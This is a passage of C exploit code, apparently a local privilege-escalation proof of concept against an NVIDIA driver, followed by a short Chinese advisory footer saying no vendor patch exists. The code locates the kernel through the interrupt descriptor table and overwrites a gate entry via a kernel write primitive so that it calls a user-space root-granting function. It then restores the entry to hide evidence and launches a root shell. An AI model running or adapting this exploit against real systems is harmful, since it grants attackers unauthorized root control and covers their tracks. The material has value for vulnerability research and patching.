// X86_OF_ENTRY
unsigned long idtentry = getidt() + (2*sizeof(unsigned long)*4);
pack_gate(&gate, GATE_INTERRUPT, KERNEL_BASE, YES_PLEASE, 0, __KERNEL_CS);
for (i = 0; i < 256; ++i) {
kernel_ofs_phys = i * 1024 * 1024;
physread16(handle, virt2phys(idtentry), buf);
// Copy offsets since we don't really care about them
gate.offset_low = dp->offset_low;
gate.offset_middle = dp->offset_middle;
#ifndef __x86_64__
gate.segment = dp->segment;
if (*(uint64_t*)&dp[1] == 0x00000000ffffffffULL) {
printf("[X] 64-bits kernel found at ofs %lx\n", kernel_ofs_phys);
printf("[X] Compiled for 32-bits only\n");
continue;
}
#endif
if (!memcmp(&gate, dp, sizeof(*dp))) {
printf("[*] %zu-bits Kernel found at ofs %lx\n", sizeof(void*)*8, kernel_ofs_phys);
found = 1;
break;
}
}
if (!found) {
printf("[X] No kernel found! >:(\n");
return -1;
}
idtentry = getidt() + (2*sizeof(unsigned long)*ENTRY);
printf("[*] Using IDT entry: %d (%#lx)\n", ENTRY, idtentry);
physread16(handle, virt2phys(idtentry), buf);
dump_gate(dp);
printf("[*] Enhancing gate entry...\n");
pack_gate(&gate, GATE_INTERRUPT, (uintptr_t)&(testgetroot), YES_PLEASE, 0, __KERNEL_CS);
kernel_write(handle, idtentry, (unsigned long)&gate, sizeof(gate));
physread16(handle, virt2phys(idtentry), (uint32_t*)gate2);
if (memcmp(&gate, gate2, sizeof(gate))) {
printf("[ ] Failed!\n");
return -1;
}
printf("[*] Triggering payload...\n");
ret = callsetroot(getuid(), getgid());
// And restore old one, I'm kind like that
printf("[*] Hiding evidence...\n");
kernel_write(handle, idtentry, (unsigned long)dp, sizeof(*dp));
if (ret)
printf("callsetroot returned %lx (%li)\n", ret, ret);
if (getuid()) {
printf("[*] Failed to get root.\n");
return -1;
}
printf("[*] Have root, will travel..\n");
execl("/bin/bash", "sh", NULL);
perror("/bin/bash");
return 1;
}
建议:
--------------------------------------------------------------------------------
厂商补丁:
NVIDIA
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: